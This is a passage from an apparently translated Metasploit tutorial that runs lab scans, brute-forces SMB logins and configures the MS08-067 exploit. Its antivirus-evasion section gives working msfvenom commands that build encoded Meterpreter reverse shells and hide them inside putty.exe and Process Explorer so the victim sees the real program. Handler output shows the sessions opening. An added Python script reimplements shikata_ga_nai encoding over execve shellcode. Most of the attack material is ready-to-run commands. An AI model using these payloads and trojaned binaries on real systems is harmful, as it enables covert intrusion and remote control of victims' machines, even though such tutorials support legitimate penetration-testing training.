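  </Report>
</NessusClientData_v2>
"""

SEVERITY = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}


def summarize_nessus(xml_text: str) -> list:
    """One row per ReportHost, using the import rules described in the lead-in:
    a service per distinct (port, protocol) with port != 0, and a vuln per
    ReportItem that carries a plugin ID, whatever its severity."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("ReportHost"):
        services, by_sev = set(), Counter()
        for item in host.iter("ReportItem"):
            port = int(item.get("port", "0"))
            if port != 0:
                services.add((port, item.get("protocol", "")))
            if item.get("pluginID", "0") != "0":
                by_sev[SEVERITY.get(int(item.get("severity", "0")), "info")] += 1
        os_tag = host.find("HostProperties/tag[@name='operating-system']")
        rows.append({
            "address": host.get("name"),
            "os": os_tag.text if os_tag is not None else "",
            "svcs": len(services),
            "vulns": sum(by_sev.values()),
            "actionable": by_sev["critical"] + by_sev["high"],
            "by_severity": dict(by_sev),
        })
    return rows


def hosts_table(rows) -> str:
    """Same columns as `hosts -c address,svcs,vulns`, plus the critical+high count."""
    lines = [f"{'address':<15} {'svcs':>4} {'vulns':>5} {'crit+high':>9}",
             f"{'-------':<15} {'----':>4} {'-----':>5} {'---------':>9}"]
    for r in rows:
        lines.append(f"{r['address']:<15} {r['svcs']:>4} {r['vulns']:>5} {r['actionable']:>9}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(hosts_table(summarize_nessus(SAMPLE_NESSUS)))
```

The port="0" item on the first host contributes a vuln but no service, which is why svcs can be much smaller than vulns in the real table above; the actionable column is the number to prioritise from, not vulns.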

List all vulnerabilities

msf6 > vulns


Targeted checks

Testing SMB logins
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/smb/smb_login) > set smbuser root
smbuser => root
msf6 auxiliary(scanner/smb/smb_login) > set smbpass 123456
smbpass => 123456
msf6 auxiliary(scanner/smb/smb_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/smb/smb_login) > run

Every failed attempt counts against the target's account-lockout policy, so keep the user and password lists short against domain-joined hosts.


Scanning for VNC servers with no authentication

VNC (Virtual Network Computing) is a remote-control tool developed at AT&T's research laboratory in Cambridge, England. It is free, open-source software on UNIX/Linux, and its remote-control capabilities compare with any remote-control software on Windows or macOS. On Linux VNC consists of four commands: vncserver, vncviewer, vncpasswd and vncconnect; most users only need vncserver and vncviewer.

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
threads => 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run


Scanning for open X11 servers

X11, the X Window System (X11 or simply X), is a bitmapped windowing system: the standard toolkit and protocol for building graphical user interfaces on Unix, Unix-like systems and OpenVMS, and available on almost every modern operating system. open_x11 connects to TCP 6000 and checks whether the server accepts clients without authentication (the effect of xhost +); an open X server lets anyone on the network read keystrokes and screen contents.

msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24
rhost => 192.168.0.106/24
msf6 auxiliary(scanner/x11/open_x11) > set threads 100
threads => 100
msf6 auxiliary(scanner/x11/open_x11) > run
[*] 192.168.0.106/24:6000 - Scanned  31 of 256 hosts (12% complete)
[*] 192.168.0.106/24:6000 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)
[-] 192.168.0.157:6000- 192.168.0.157 Access Denied
[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)
[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

No host on the subnet exposed an unauthenticated X server; 192.168.0.157 listens on 6000 but rejected the connection (Access Denied), which is the expected state for a server with access control turned on.


Starting the exploitation


Commonly used msf6 commands

show exploits lists all exploit modules:

msf6 > show exploits

Exploits
========

   #  Name                                                Disclosure Date  Rank       Check  Description
   -  ----                                                ---------------  ----       -----  -----------
   0  exploit/aix/local/ibstat_path                       2013-09-24       excellent  Yes    ibstat $PATH Privilege Escalation
   1  exploit/aix/local/xorg_x11_server                   2018-10-25       great      Yes    Xorg X11 Server Local Privilege Escalation
   2  exploit/aix/rpc_cmsd_opcode21                       2009-10-07       great      No     AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   3  exploit/aix/rpc_ttdbserverd_realpath                2009-06-17       great      No     ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   4  exploit/android/adb/adb_server_exec                 2016-01-01       excellent  Yes    Android ADB Debug Server Remote Payload Execution
   5  exploit/android/browser/samsung_knox_smdm_url       2014-11-12       excellent  No     Samsung Galaxy KNOX Android Browser RCE
   6  exploit/android/browser/stagefright_mp4_tx3g_64bit  2015-08-13       normal     No     Android Stagefright MP4 tx3g Integer Overflow


show auxiliary lists all auxiliary modules:

msf6 > show auxiliary

Auxiliary
=========

   #  Name                                                        Disclosure Date  Rank    Check  Description
   -  ----                                                        ---------------  ----    -----  -----------
   0  auxiliary/admin/2wire/xslt_password_reset                   2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability
   1  auxiliary/admin/android/google_play_store_uxss_xframe_rce                    normal  No     Android Browser RCE Through Google Play Store XFO
   2  auxiliary/admin/appletv/appletv_display_image                                normal  No     Apple TV Image Remote Control
   3  auxiliary/admin/appletv/appletv_display_video                                normal  No     Apple TV Video Remote Control
   4  auxiliary/admin/atg/atg_client                                               normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client


show options prints the options of the current module, use selects a module, back leaves it, and search finds modules by keyword:

msf6 > show options
msf6 > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > back
msf6 > search mysql

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


List the payloads compatible with a module

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads


Select a payload

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

List the exploit's targets
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)


Show the full module description, including the targets

msf6 exploit(windows/smb/ms08_067_netapi) > info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm
  Brett Moore <brett.moore@insomniasec.com>
  frank2
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  79  Windows 2003 SP2 Russian (NX)
  80  Windows 2003 SP2 Swedish (NX)
  81  Windows 2003 SP2 Turkish (NX)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization code of
  NetAPI32.dll through the Server Service. This module is capable of bypassing
  NX on some operating systems and service packs. The correct target must be
  used to prevent the Server Service (along with a dozen others in the same
  process) from crashing. Windows XP targets seem to handle multiple successful
  exploitation events, but 2003 targets will often crash or hang on subsequent
  attempts. This is just the first version of this module, full support for NX
  bypass on 2003, along with other platforms, is still in development.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Because "Check supported" is Yes, run check before exploit: the description warns that a wrong target crashes the Server Service and the other services sharing its process.


msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105
lhost => 192.168.0.105
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.105    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf6 exploit(windows/smb/ms08_067_netapi) > unset lhost
Unsetting lhost...
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


Set lhost globally, for all modules

setg writes to the global datastore, so the value applies to every module you load afterwards; unsetg removes it again.

msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost


Antivirus evasion

msfvenom

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

Generate a Windows Meterpreter executable, encoded ten times with shikata_ga_nai and avoiding the bytes \x00, \x0a and \xff:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

Generate a raw (R) Android Meterpreter APK:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk

Evading antivirus detection

Using MSF encoders

Encoders exist to remove bad characters from a payload; they are not an antivirus bypass in themselves, and shikata_ga_nai output in particular has been signatured by AV products for years, so expect a stock encoded executable to be flagged.

# msfvenom -l encoders

Framework Encoders [--encoder]
==============================

    Name                      Rank       Description
    ----                      ----       -----------
    x86/shikata_ga_nai        excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit     manual     Single Static Bit
    x86/unicode_mixed         manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper         manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic           normal     Dynamic key XOR Encoder

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
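What "-e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10" does to the payload bytes is simple arithmetic, and seeing it makes the size growth in the msfvenom output below (381, 408, 435 ... bytes, 27 more per pass) and the purpose of -b clear. The following is an added example, not code from the article or from Metasploit: a Python XOR additive-feedback encoder with the same key search, rejecting keys whose own bytes are bad characters (the key is embedded in the decoder stub) and outputs that contain one, plus chained iterations and the matching decoder. The decoder is Python rather than an x86 stub, so the per-iteration stub bytes are not produced here, and padding to a 4-byte boundary with 0x90 is my simplification. The sample input is the well-known 23-byte Linux x86 execve("/bin/sh") shellcode, used only as bytes; nothing is executed.

```python
# Added example, not code from the original article or from Metasploit: the
# arithmetic behind "-e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10".
# shikata_ga_nai is an XOR additive-feedback encoder: each dword is XORed with
# a running 32-bit key and the key is then advanced by adding the decoded
# dword. msfvenom picks a random key, checks that neither the key (it lives
# inside the decoder stub) nor the encoded bytes contain a bad character, and
# prepends an x86 decoder stub; here the decoder is plain Python, so the
# per-iteration stub growth seen in the msfvenom output does not appear.
# Padding with 0x90 to a dword boundary is my simplification.
import random
import struct

BAD_CHARS = {0x00, 0x0a, 0xff}           # the -b '\x00\x0a\xff' list from the article

# Sample input only: the well-known 23-byte Linux x86 execve("/bin/sh")
# shellcode. Nothing in this script executes it.
SAMPLE_SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")


def has_bad(data: bytes, bad=BAD_CHARS) -> bool:
    return any(b in bad for b in data)


def _dwords(data: bytes):
    if len(data) % 4:
        data += b"\x90" * (4 - len(data) % 4)      # simplification: NOP padding
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]


def xor_additive_encode(payload: bytes, key: int) -> bytes:
    out = bytearray()
    for plain in _dwords(payload):
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & 0xFFFFFFFF          # feedback: next key depends on the plaintext
    return bytes(out)


def xor_additive_decode(encoded: bytes, key: int) -> bytes:
    out = bytearray()
    for enc in _dwords(encoded):
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF          # same feedback from the recovered dword
    return bytes(out)


def find_key(payload: bytes, bad=BAD_CHARS, rng=random, attempts=100000):
    """Random key search as the encoder does it: reject keys whose own bytes are
    bad (they end up in the stub) and outputs that contain a bad byte."""
    for _ in range(attempts):
        key = rng.getrandbits(32)
        if has_bad(struct.pack("<I", key), bad):
            continue
        encoded = xor_additive_encode(payload, key)
        if not has_bad(encoded, bad):
            return key, encoded
    raise RuntimeError("no key satisfies the bad-character constraint")


def encode_iterations(payload: bytes, iterations: int, bad=BAD_CHARS, rng=random):
    """-i N: feed each pass's output into the next; returns all keys and the final bytes."""
    keys, data = [], payload
    for _ in range(iterations):
        key, data = find_key(data, bad, rng)
        keys.append(key)
    return keys, data


def decode_iterations(encoded: bytes, keys) -> bytes:
    """Undo the passes in reverse order (the outermost stub runs first)."""
    data = encoded
    for key in reversed(keys):
        data = xor_additive_decode(data, key)
    return data


def demo(iterations: int = 10, seed: int = 2022) -> dict:
    """Deterministic end-to-end run: encode N times, verify cleanliness and round trip."""
    keys, blob = encode_iterations(SAMPLE_SHELLCODE, iterations, rng=random.Random(seed))
    return {"keys": keys, "encoded": blob, "clean": not has_bad(blob),
            "round_trip": decode_iterations(blob, keys)[:len(SAMPLE_SHELLCODE)] == SAMPLE_SHELLCODE}


if __name__ == "__main__":
    result = demo()
    print("keys:", [f"{k:08x}" for k in result["keys"]])
    print("encoded has bad chars:", not result["clean"], "| round-trip ok:", result["round_trip"])
```

Each extra iteration only re-keys bytes that were already free of bad characters and, in the real tool, bolts on another decoder stub; it changes the byte pattern but not the behaviour, which is why stacking -i does little against signature or emulation based detection.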


Custom executable template

wget http://download.sysinternals.com/files/ProcessExplorer.zip (or fetch it from a domestic mirror)

Use procexp.exe from the archive as the template (-x) for the payload:

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload1.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 2661376 bytes
Saved as: payload1.exe


Upload payload1.exe to the Windows host and run it; on the attacking host, start a handler first:


# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800
meterpreter > pwd
C:\Users\xiang\Desktop


Launching the payload without disturbing the template

With -k the template keeps its normal behaviour and the payload runs in a new thread, so the user sees the real program start (putty.exe here):

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b '\x00\x0a\xff' -i 10 -f exe -o payload2.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 702464 bytes
Saved as: payload2.exe


Upload payload2.exe to the Windows host and run it, with the same handler waiting:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800
meterpreter >

Packing

upx

UPX compresses the executable, which changes its bytes on disk but is itself a well-known AV heuristic, and anyone can restore the original with upx -d; it hides nothing from an analyst.

# upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                      -l    list compressed file
  -t     test compressed file                -V    display version number
  -h     give more help                   -L    display software license
Options:
  -q     be quiet                         -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io